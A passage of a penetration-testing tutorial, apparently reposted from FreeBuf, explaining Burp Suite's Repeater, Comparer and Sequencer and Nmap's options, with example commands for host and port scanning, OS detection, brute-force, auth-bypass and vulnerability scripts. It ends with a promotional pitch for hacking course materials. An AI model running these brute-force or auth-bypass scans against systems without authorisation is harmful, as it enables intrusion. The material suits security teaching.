● Hex: Allows direct editing of messages consisting of raw binary data. During the penetration testing process, we often use Repeater to conduct message verification and analysis of requests and responses, such as modifying request parameters and verifying input vulnerabilities; modifying request parameters and verifying logic override; and capturing characteristic request messages from interception history records. Request replay. This section will send the captured packet to Repeater, as shown in the following figure:
In the Repeater operation interface, the Request on the left is the request message area, and the Response on the right is the response message area. The request message area displays the detailed information of the request message sent by the client. After we edit the request message, click the "Go" button to send the request to the server, as shown in the following figure:
The response message area displays the feedback message from the server after clicking the "GO" button for the corresponding request message. By modifying the parameters of the request message to compare and analyze the differences between each response message, it can better help us analyze possible vulnerabilities in the system, as shown in the following figure:
3.4 Compare
Burp Comparer mainly provides a visual difference comparison function in Burp Suite to compare and analyze the difference between two data. It is used in the following situations:
● During the process of enumerating user names, compare and analyze the difference in the feedback results from the server when the login is successful and failed.
● When using Intruder to attack, you can quickly analyze the difference between the two responses based on different server responses.
● When performing blind injection testing of SQL injection, compare the difference between the two response messages and determine the relationship between the response results and the injection conditions. There are two steps when using Comparer. The first is data loading:
Then there is the difference analysis:
The common ways of loading Comparer data are as follows.
● Forwarded from other Burp tools via context menu.
● Paste directly.
● Load from file. After loading, if you select two different request or response messages, the issued comparison button will be activated, and you can choose text comparison or byte comparison.
3.5 Sequencer
Burp Sequencer is a tool for analyzing the randomness quality of data samples. You can use it to test scenarios such as whether the application's session token (Session token) and password reset token are predictable. Through Sequencer's data sample analysis, you can well reduce the risk of these key data being forged.
Burp Sequencer is mainly composed of three modules: information interception (Live Capture), manual loading (Manual Load) and option analysis (Analysis Options).
After intercepting the information, click the Load button to load the information, and then click the "Analyze now" button to analyze, as shown in the following figure:
Nmap
1.Nmap detailed explanation
Nmap (Network Mapper) is an open source network detection and security audit tool. It is designed to quickly scan large networks, including host detection and discovery, open port status, operating system and application service fingerprinting, WAF identification and common security vulnerabilities. Its graphical interface is Zenmap and the distributed framework is DNmap.
The features of Nmap are as follows:
● Host detection: Detect hosts on the network, such as listing hosts that respond to TCP and ICMP requests, ICMP requests, and open special ports.
● Port scanning: detect the ports opened by the target host.
● Version detection: Detect the network service of the target host and determine its service name and version number.
● System detection: Detect the operating system of the target host and the hardware characteristics of the network equipment.
● Supports the writing of detection scripts: using Nmap's script engine (NSE) and Lua programming language.
2.Install Nmap
The download address of Nmap is https://nmap.org/download.html. The version downloaded in this section is 7.40. Readers can install step by step according to the prompts during the installation process, as shown in the figure below:
3. Getting started with Nmap
3.1 Scan parameters
After entering the installation directory, execute Nmap directly on the command line or view the help document (enter nmap –help). The usage and functions of Namp will be displayed, as shown in the following figure:
Before explaining the specific usage, let's first introduce the meaning and usage of Nmap's related parameters. First, we introduce the relevant parameters used when setting the scanning target, as follows:
● -iL:从文件中导入目标主机或目标网段。
● -iR:随机选择目标主机。
● --exclude:后面跟的主机或网段将不在扫描范围内。
● --excludefile:导入文件中的主机或网段将不在扫描范围中。
与主机发现方法相关的参数如下。
● -sL:List Scan(列表扫描),仅列举指定目标的IP,不进行主机发现。
● -sn:Ping Scan,只进行主机发现,不进行端口扫描。
● -Pn:将所有指定的主机视作已开启,跳过主机发现的过程。
● -PS/PA/PU/PY\[portlist\]:使用TCP SYN/ACK或SCTP INIT/ECHO方式来发现。
● -PE/PP/PM:使用ICMP echo、timestamp、netmask请求包发现主机。
● -PO\[protocollist\]:使用IP协议包探测对方主机是否开启。
● -n/-R:-n表示不进行DNS解析;-R表示总是进行DNS解析。
● --dns-servers<serv1\[, serv2\], ...>:指定DNS服务器。
● --system-dns:指定使用系统的DNS服务器。
● --traceroute:追踪每个路由节点。
与常见的端口扫描方法相关的参数如下。
● -sS/sT/sA/sW/sM:指定使用TCP SYN/Connect()/ACK/Window/Maimon scans的方式对目标主机进行扫描。
● -sU:指定使用UDP扫描的方式确定目标主机的UDP端口状况。
● -sN/sF/sX:指定使用TCP Null/FIN/Xmas scans秘密扫描的方式协助探测对方的TCP端口状态。
● --scanflags<flags>:定制TCP包的flags。
● -sI<zombie host\[:probeport\]>:指定使用Idle scan的方式扫描目标主机(前提是需要找到合适的zombie host)。
● -sY/sZ:使用SCTP INIT/COOKIE-ECHO扫描SCTP协议端口的开放情况。
● -sO:使用IP protocol扫描确定目标机支持的协议类型。
● -b<FTP relay host>:使用FTP bounce scan扫描方式。
跟端口参数与扫描顺序的设置相关的参数如下。
● -p<port ranges>:扫描指定的端口。
● -F:Fast mode(快速模式),仅扫描TOP 100的端口。
● -r:不进行端口随机打乱的操作(如无该参数,Nmap会将要扫描的端口以随机顺序的方式进行扫描,让Nmap的扫描不易被对方防火墙检测到)。
● --top-ports<number>:扫描开放概率最高的number个端口(Nmap的作者曾做过大规模的互联网扫描,以此统计网络上各种端口可能开放的概率,并排列出最有可能开放端口的列表,具体可以参见nmap-services文件。默认情况下,Nmap会扫描最有可能的1000个TCP端口)。
● --port-ratio<ratio>:扫描指定频率以上的端口。与上述--top-ports类似,这里以概率作为参数,概率大于--port-ratio的端口才被扫描。显然参数必须在0~1之间,想了解具体的概率范围可以查看nmap-services文件。
与版本侦测相关的参数如下所示。
● -sV:指定让Nmap进行版本侦测。
● --version-intensity<level>:指定版本侦测的强度(0~9),默认为7。数值越高,探测出的服务越准确,但是运行时间会比较长。
● --version-light:指定使用轻量级侦测方式(intensity 2)。
● --version-all:尝试使用所有的probes进行侦测(intensity 9)。
● --version-trace:显示出详细的版本侦测过程信息。
After understanding the above parameters and their meanings, it will be better to understand the usage. The scanning command format is: Nmap + scanning parameters + target address or network segment. For example, a complete Nmap scan command is as follows:
nmap -T4 -A -v ip
Among them, -A means to scan in an aggressive way; -T4 means to specify the timing used in the scanning process. There are 6 levels (0~5). The higher the level, the faster the scanning speed, but it is also easy to be blocked by the firewall. Or IDS detects and blocks it. It is recommended to use T4 when the network communication condition is good. -v means displaying verbosity information and displaying scan details during the scanning process, which helps users understand the current scanning status.
3.2 Common methods
Nmap has many parameters, but usually not that many are used. The following are the more common commands during penetration testing.
1. Scan a single target address
Just add the target address directly after Nmap to scan, as shown in the figure below:
nmap 192.168.0.100
2. Scan multiple target addresses
If the target addresses are not in the same network segment, or are in the same network segment but are not consecutive and have a small number, you can use this method to scan, as shown in the following figure:
nmap 192.168.0.100 192.168.0.105
3. Scan a range of target addresses
You can specify to scan a continuous network segment, using a "-" connection in the middle. For example, the following command indicates that the scanning range is 192.168.0.100~192.168.0.110, as shown in the following figure:
nmap 192.168.0.100-110
4. Scan a certain network segment where the target address is located
Taking segment C as an example, if the target is a network segment, you can scan by adding a subnet mask. The following command indicates that the scanning range is 192.168.0.1~192.168.0.255, as shown in the figure below:
nmap 192.168.0.100/24
5. Scan all target addresses in the host list targets.txt
Scan the address or network segment in targets.txt. The absolute path is imported here. If the targets.txt file is in the same directory as nmap.exe, just quote the file name directly, as shown in the following figure:
nmap -iL C:\\Users\\Aerfa\\Desktop\\targets.txt
6. Scan all target addresses except one target address
The following command means to scan other 192.168.0.x addresses except 192.168.0.105. Judging from the scan results, 192.168.0.105 is indeed not scanned, as shown in the following figure:
nmap 192.168.0.100/24 -exclude 192.168.0.105
7. Scan target addresses other than those in a file
The following command indicates scanning target addresses other than the addresses or network segments involved in the target.txt folder. Let's take scanning the 192.168.0.x network segment as an example. Add 192.168.0.100 and 192.168.0.105 in targets.txt. From the scanning results, it has been confirmed that this method is effective and available, as shown in the following figure:
nmap 192.168.0.100/24 -excludefile C:\\Users\\Aerfa\\Desktop\\targets.txt
8. Scan ports 21, 22, 23, and 80 of a certain target address
If you do not need to perform a full port scan on the target host and just want to detect whether it has a certain port open, then using the -p parameter to specify the port number will greatly improve the scanning speed, as shown in the following figure:
nmap 192.168.0.100 -p 21,22,23,80
9. Perform route tracing on the target address
The following command indicates route tracing for the target address, as shown in the figure below:
nmap --traceroute 192.168.0.105
10. Scan the online status of segment C where the target address is located
The following command indicates the online status of segment C where the scan target address is located, as shown in the following figure:
nmap -sP 192.168.0.100/24
11. Operating system fingerprinting of target address
The following command indicates the version of the operating system that identifies the target address through fingerprint recognition technology, as shown in the following figure:
nmap -O 192.168.0.105
12. Detection of service version provided by the target address
The following command indicates to detect the service version information corresponding to the port opened by the target address, as shown in the following figure:
nmap -sV 192.168.0.105
13. Detect firewall status
In actual combat, FIN scanning can be used to detect the status of the firewall. FIN scanning is used to identify whether the port is closed. Receiving an RST reply indicates that the port is closed. Otherwise, it is in the open or filtered state, as shown in the following figure:
nmap -sF -T4 192.168.0.105
3.3 Status recognition
Nmap outputs a scan list, including port number, port status, service name, service version and protocol. There are usually 6 states as shown in the table below.
Understanding the above status will help us determine what method or attack method should be taken next during the penetration testing process.
3.4 Script introduction
Nmap scripts are stored in the /xx/nmap/scripts folder by default, as shown in the following figure:
Nmap scripts are mainly divided into the following categories:
● Auth:负责处理鉴权证书(绕过鉴权)的脚本。
● Broadcast:在局域网内探查更多服务的开启情况,如DHCP/DNS/SQLServer等。
● Brute:针对常见的应用提供暴力破解方式,如HTTP/SMTP等。
● Default:使用-sC或-A选项扫描时默认的脚本,提供基本的脚本扫描能力。
● Discovery:对网络进行更多信息的搜集,如SMB枚举、SNMP查询等。
● Dos:用于进行拒绝服务攻击。
● Exploit:利用已知的漏洞入侵系统。
● External:利用第三方的数据库或资源。例如,进行Whois解析。
● Fuzzer:模糊测试脚本,发送异常的包到目标机,探测出潜在漏洞。
● Intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽。
● Malware:探测目标机是否感染了病毒、开启后门等信息。
● Safe:此类与Intrusive相反,属于安全性脚本。
● Version:负责增强服务与版本扫描功能的脚本。
● Vuln:负责检查目标机是否有常见漏洞,如MS08-067。
Users can also set the –script= category for scanning as needed. Commonly used parameters are as follows:
● -sC/--script=default:使用默认的脚本进行扫描。
● --script=<Lua scripts>:使用某个脚本进行扫描。
● --script-args=key1=value1, key2=value2······:该参数用于传递脚本里的参数, key1是参数名,该参数对应value1这个值。如有更多的参数,使用逗号连接。
● -script-args-file=filename:使用文件为脚本提供参数。
● --script-trace:如果设置该参数,则显示脚本执行过程中发送与接收的数据。
● --script-updatedb:在Nmap的scripts目录里有一个script.db文件,该文件保存了当前Nmap可用的脚本,类似于一个小型数据库,如果我们开启Nmap并调用了此参数,则Nmap会自行扫描scripts目录中的扩展脚本,进行数据库更新。
● --script-help:调用该参数后,Nmap会输出该脚本对应的脚本使用参数,以及详细的介绍信息。
3.5 Examples
1.Authentication scan
Use –script=auth to apply weak password detection to the target host or the network segment where the target host is located, as shown in the following figure:
nmap --script=auth 192.168.0.105
2. Brute force attack
Nmap has the function of brute force cracking, which can brute force guess simple passwords for databases, SMB, SNMP, etc., as shown in the following figure:
nmap --script=brute 192.168.0.105
3. Scan for common vulnerabilities
Nmap has a vulnerability scanning function that can check whether there are common vulnerabilities in the target host or network segment, as shown in the following figure:
nmap --script=vuln 192.168.0.105
4. Application service scanning
Nmap has scanning scripts for many common application services, such as VNC service, MySQL service, Telnet service, Rsync service, etc. Here we take the VNC service as an example, as shown in the following figure:
nmap --script=realvnc-auth-bypass 192.168.0.105
5. Detect the opening of more services in the LAN
Enter the following command to detect the opening of more services in the LAN, as shown in the figure below:
nmap -n -p 445 --script=broadcast 192.168.0.105
6.Whois analysis
Use a third-party database or resource to query the target address information, such as Whois analysis, as shown in the following figure:
nmap -script external baidu.com
For more information on how to use scanning scripts, see https://nmap.org/nsedoc/categories.
Author of this article: woshidatianguan, please indicate the source of reprint from FreeBuf.COM
` How to learn hacking & network security
As long as you like my article today, my private network security learning materials will be shared with you for free. Come and see what is available.
1. Learning roadmap
There are a lot of things to learn about attack and defense. I have written down the specific things you need to learn in the road map above. If you can complete them, you will have no problem getting a job or taking on a private job.
2. Video tutorial
Although there are many learning resources on the Internet, they are basically incomplete. This is an Internet security video tutorial I recorded myself. I have accompanying video explanations for every knowledge point in the roadmap above.
The content covers the study of network security laws, network security operations and other security assessments, penetration testing basics, detailed explanations of vulnerabilities, basic computer knowledge, etc. They are all must-know learning contents for getting started with network security.
(They are all packaged into one piece and cannot be expanded one by one. There are more than 300 episodes in total)
Due to limited space, only part of the information is displayed. You need to click on the link below to obtain it.
3. Technical documents and e-books
I also compiled the technical documents myself, including my experience and technical points in participating in large-scale network security operations, CTF, and digging SRC vulnerabilities. There are more than 200 e-books. Due to the sensitivity of the content, I will not display them one by one.
Due to limited space, only part of the information is displayed. You need to click on the link below to obtain it.
4. Toolkit, interview questions and source code
"If you want to do your job well, you must first sharpen your tools." I have summarized dozens of the most popular hacking tools for everyone. The scope of coverage mainly focuses on information collection, Android hacking tools, automation tools, phishing, etc. Interested students should not miss it.
There is also the case source code and corresponding toolkit mentioned in my video, which you can take away if needed.
Due to limited space, only part of the information is displayed. You need to click on the link below to obtain it.
Finally, here are the interview questions about network security that I have compiled over the past few years. If you are looking for a job in network security, they will definitely help you a lot.
These questions are often encountered when interviewing Sangfor, Qi Anxin, Tencent or other major companies. If you have good questions or good insights, please share them.
Reference analysis: Sangfor official website, Qi’anxin official website, Freebuf, csdn, etc.
Content features: Clear organization and graphical representation to make it easier to understand.
Summary of content: Including intranet, operating system, protocol, penetration testing, security service, vulnerability, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logical vulnerability, tools, SQLmap, NMAP, BP, MSF…
Due to limited space, only part of the information is displayed. You need to click on the link below to obtain it.